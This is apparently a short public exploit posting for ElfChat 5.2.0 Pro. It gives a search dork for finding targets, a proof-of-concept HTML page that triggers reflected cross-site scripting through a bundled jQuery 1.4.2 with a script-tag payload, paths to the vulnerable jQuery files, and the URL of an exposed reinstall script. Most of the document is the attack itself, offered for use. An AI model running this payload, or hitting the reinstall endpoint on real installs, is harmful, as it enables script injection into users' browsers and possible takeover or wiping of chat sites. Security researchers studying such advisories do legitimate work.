ElfChat version 5.2.0 Pro suffers from a cross site scripting vulnerability.
14c2be5038a765871520e53de63ae1d22508257a57f5adb84596065a25eb45eb
ElfChat 5.2.0 Pro Reinstall SCript EXploits
===========================================
Author : indoushka
Vondor : https://elfchat.ru/
Dork: 2011 Elfet - ElfChat 5.2.0 Pro
==========================
<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery 1.4.2 </title>
<script src="https://127.0.0.1/ElfChat//admin/js/jquery-1.4.2.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script>alert('xss
reflected - jquery 1.4.2 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com');</script></option>
</select>
</p>
</form>
</body>
</html>
===
and :
/ElfChat/js/datepicker/js/jquery.js
/ElfChat/js/min/jquery.js
Reinstall SCript :
https://127.0.0.1/ElfChat/install/index.php?act=settings